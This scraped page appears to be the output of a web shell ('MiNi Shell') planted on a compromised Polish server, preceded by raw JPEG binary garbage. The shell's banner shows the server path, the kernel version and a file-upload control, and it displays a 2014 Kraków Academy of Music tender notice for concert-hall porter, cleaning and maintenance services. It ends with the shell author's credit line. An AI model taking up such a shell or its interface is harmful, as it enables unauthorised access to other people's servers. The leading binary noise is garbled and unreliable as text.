JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141118/377472-N-2014.html

<p class="kh_header"><b>Kraków: Kompleksowa obsługa Auli Koncertowej Akademii Muzycznej w Krakowie Florianka w  budynku  przy  ul. Basztowej  8 w Krakowie.</b><br>
<b>Numer ogłoszenia: 377472 - 2014; data zamieszczenia: 18.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Muzyczna w Krakowie , ul. Św. Tomasza 43, 31-027 Kraków, woj. małopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.amuz.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa Auli Koncertowej Akademii Muzycznej w Krakowie Florianka w  budynku  przy  ul. Basztowej  8 w Krakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy zakres zamówienia :    
-	całodobowe prowadzenie portierni oraz dozorowanie budynku Florianka
           (dokładny zakres czynności określa załącznik nr 1 do nin. Specyfikacji),
-	zabezpieczenie doraźne portierni przez portiera (portiernia Ogólnokształcącej Szkoły Muzycznej 1st.),    
-	obsługa szatni (według zasad określonych w załączniku nr 2 do nin. Specyfikacji),
-	utrzymanie czystości i stanu sanitarnego wewnątrz i na zewnątrz budynku
           (rodzaj i częstotliwość prac podaje załącznik nr 3 do nin. Specyfikacji),
-	bieżąca konserwacja urządzeń i sprzętów w budynku oraz zakup i wymiana
           żarówek, bezpieczników, itp. (zgodnie z załącznikiem nr 4 do nin. 
           Specyfikacji),  
-	doraźne uruchamianie bufetu w terminach zgłaszanych przez Zamawiającego
           (kawa, herbata, napoje, artykuły spożywcze pakowane).
           Zamawiający nieodpłatnie użyczy pomieszczenie do prowadzenia bufetu oraz 
           znajdujące się tam sprzęty (kuchenka elektryczna, lodówka).
-	kompleksowa obsługa koncertów i innych imprez Akademii Muzycznej 
           (szczegółowe warunki podaje załącznik nr 5).

 Dodatkowe informacje dla oferentów :
1. szczegółowe zestawienie powierzchni i kubatur w obiekcie przedstawia
    załącznik nr 6,

2.  czynniki mające wpływ na cenę ryczałtową określono w załączniku nr 7,

3.  wymagane jest wykonywanie zamówienia przez stały zespół pracowników 
    (wyłącznie pełnosprawnych), w liczbie co najmniej 7 osób (na pełnych     
    etatach),

4.  nie jest wymagane sprawowanie dozoru budynku przez licencjonowanych
     pracowników,

5.  pracownicy zatrudnieni na portierni przy ul. Basztowej 8 muszą wykazywać 
     się komunikatywnością, uprzejmością, samodzielnością, schludnością w 
     ubiorze oraz być wyposażeni w  identyfikatory,

6.  Wykonawca zobowiązany jest wskazać w ofercie części zamówienia, których 
     wykonanie zamierza powierzyć podwykonawcom. Wykonawca ponosi pełną 
     odpowiedzialność za prace wykonane przez podwykonawców, również za usterki 
     gwarancyjne. 

7.  wykonawca jest zobowiązany do zapewnienia środków czystości i sprzętu  
niezbędnego do wykonywania prac porządkowych oraz zaopatrzenia toalet w          mydło w płynie, ręczniki jednorazowe, papier toaletowy i środki zapachowe.
Zamiarem Zamawiającego jest utrzymanie poziomu czystości wnętrz w standardzie nie gorszym niż dotychczas (należy stosować m.in. środki typu Cif, Ajax, AmbiPur, mydło w płynie i ręczniki firmy Merida, pasta i zmywacz do podłóg typu Dispersion, Raptopur, Striper).
     Środki czystości wskazane powyżej  należy traktować jako propozycje przykładowe,   
     wskazane w celu określenia standardu świadczonej usługi.
     Zamawiający dopuszcza rozwiązania równoważne w tym zakresie, przy czym  
     Wykonawca, który będzie chciał zastosować środki czystości  równoważne musi złożyć 
      do oferty -  oświadczenie, w którym wskaże środki równoważne oraz wykaże, że 
      rozwiązania przez niego  proponowane są równoważne żądanym przez Zamawiającego. 
      Równoważność w tym  zakresie  udokumentuje załączając do powyższego 
      oświadczenia, normy, aprobaty.

8.  wykonawca jest zobowiązany prowadzić prace porządkowe zgodnie z 
     zaleceniami Pracowni Konserwacji Zabytków (załącznik nr 10 do nin. Specyfikacji)
     oraz instrukcją obsługi kołowrotków do opuszczania żyrandoli (załącznik nr 11),    

9.  wykonawca jest zobowiązany do wzięcia odpowiedzialności za sprzęt i 
     wyposażenie znajdujące się w pomieszczeniach, za stan powierzonych mu 
     pomieszczeń oraz za  szkody powstałe z jego winy, 

10. Zamawiający :
                        -   nie dopuszcza składania ofert częściowych,
                        -   nie przewiduje zawarcia umowy ramowej,
                        -   nie przewiduje udzielenia zamówień uzupełniających,
                        -   nie dopuszcza składania ofert wariantowych,
                        -   nie przewiduje aukcji elektronicznej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 98.34.11.40-8, 50.70.00.00-2, 90.61.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży do oferty oświadczenie, że spełnia  warunki określone w art. 22
 ust.1 ustawy Prawo zamówień publicznych (wzór formularza w tym zakresie stanowi załącznik nr 8 do nin. Specyfikacji).
Ocena spełnienia powyższych warunków dokonana będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie  VI nin. SIWZ, według formuły :spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje posiadanie wiedzy i doświadczenia przedstawiając : 
  
a) informację,  że prowadzi działalność polegającą na świadczeniu usług 
    odpowiadających  swoim rodzajem usługom objętym niniejszym zamówieniem od 
    co najmniej 2 lat, 
b) wykonanie w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego 
    postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
    lub aktualne wykonywanie - co najmniej 1 usługi odpowiadającej swoim 
    rodzajem i wartością przedmiotowi niniejszego zamówienia.

    Przez usługę odpowiadającą przedmiotowi nin. zamówienia należy rozumieć 
    usługę polegającą na kompleksowym wykonywaniu wszystkich czynności 
    objętych niniejszym zamówieniem w zabytkowych obiektach użyteczności 
     publicznej (z uwzględnieniem specyfiki obsługi sal koncertowych), 
     świadczoną przez 6 dni w tygodniu, dla jednego podmiotu przez okres co 
     najmniej 12 kolejnych miesięcy. Wymagany minimalny czasokres 
     świadczenia usługi (12 miesięcy) musi zawierać się w ustawowym okresie 
     trzech lat przed dniem wszczęcia niniejszego postępowania.         
    
    Informacja o doświadczeniu zawodowym winna być przedstawiona w układzie   
    formularza (według wzoru, który stanowi załącznik nr 9 do nin. Specyfikacji),     
    wraz z załączeniem dowodów, czy zamówienia zostały wykonane lub są 
    wykonywane należycie.
Ocena spełnienia powyższych warunków dokonana będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie  VI nin. SIWZ, według formuły :spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje dysponowanie odpowiednimi osobami zdolnymi do wykonania zamówienia przedstawiając,    
że dysponuje i przeznaczy do realizacji niniejszego zamówienia odpowiednią 
ilość osób, dla zapewnienia należytego wykonania zamówienia.

Zamawiający uzna za spełniony ten warunku, jeżeli :     

a)  wykonawca przedstawi informację na temat liczby pracowników (zatrudnianych 
     średnio  w okresie rocznym) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia 
     działalności jest krótszy - w tym okresie.
     Zamawiający oczekuje, że wykonawca udokumentuje zatrudnianie, w okresie 
     ostatnich 2 lat, co najmniej 5 pracowników - na podstawie umowy o pracę (średnio 
     w okresie rocznym). 
b)  wykonawca przedstawi w ofercie informację o zespole wykonawczym 
     składającym się z pracowników tego wykonawcy lub przedstawi pisemne 
     zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania 
     zamówienia, 
c)  nie jest wymagane przedstawianie specjalnych dokumentów w zakresie 
     dysponowania  potencjałem technicznym  (oświadczenie wykonawcy).

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, 
osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych 
podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie
dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.  W takim przypadku również podmiot/podmioty te muszą spełniać warunki niepodlegania wykluczeniu z postępowania, o których mowa w art.24 ust.1 Ustawy .
Ocena spełnienia powyższych warunków dokonana będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie  VI nin. SIWZ, według formuły :spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty winny być załączone również : 

1.  Szczegółowa kalkulacja ofertowa (netto i brutto) za miesięczne kompleksowe
 wykonywanie zamówienia - określająca koszty zatrudnienia, ilość i rodzaj używanych środków czystości, innych materiałów i urządzeń oraz papieru toaletowego.
Należy tu również uwzględnić wszystkie ewentualne pozostałe koszty niezbędne do 
 właściwego wykonania przedmiotu zamówienia.

Kalkulacja kosztów wykonania zamówienia winna zagwarantować sprawne  realizowanie zamówienia, usługa winna być świadczona w wysokim standardzie, należy uwzględnić odpowiednią ilość środków czystości i papieru toaletowego (proporcjonalnie do ilości użytkowników sanitariatów).

Zamawiający zwraca uwagę, że w ramach zamówienia mieszczą się dwa rodzaje usług, o różnej klasyfikacji statystycznej. W związku z tym należy  odpowiednio  zastosować stawki podatku od towarów i usług (VAT).   

Kalkulacja ceny oferty - w zakresie podatku VAT - winna być sporządzona zgodnie z przepisami prawnymi obowiązującymi na dzień składania oferty.

Zamawiający dopuszcza możliwość zmiany warunków zawartej umowy, jeżeli w trakcie realizacji zamówienia nastąpi zmiana przepisów prawnych w zakresie podatku VAT. 

2.  Informacja o środkach czystości (myjących, konserwujących, czyszczących, 
dezynfekujących) proponowanych do zastosowania w trakcie realizacji zamówienia, gwarantujących spełnienie wymagań Zamawiającego określonych w punkcie III Specyfikacji.

3. Oryginał pełnomocnictwa podpisany przez uprawnionych przedstawicieli Wykonawcy (dotyczy Wykonawcy działającego przez pełnomocnika).

4. Dokument stwierdzający ustanowienie przez Wykonawców wspólnie  ubiegających się  o udzielenie zamówienia (np. konsorcjum, spółka cywilna) pełnomocnika do 
reprezentowania ich w postępowaniu o udzielenie nin. zamówienia publicznego albo 
reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia 
publicznego.  Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub  kopii poświadczonej przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści wybranej  oferty w sytuacji  zmiany przepisów prawnych w zakresie podatku od towarów  i usług (VAT) oraz w innych sytuacjach opisanych w umowie.  

W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.amuz.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Św.Tomasza 43, 31-027 Kraków, pok. 308.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2014 godzina 13:30, miejsce: ul. Św.Tomasza 43, 31-027 Kraków, pok. 308.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com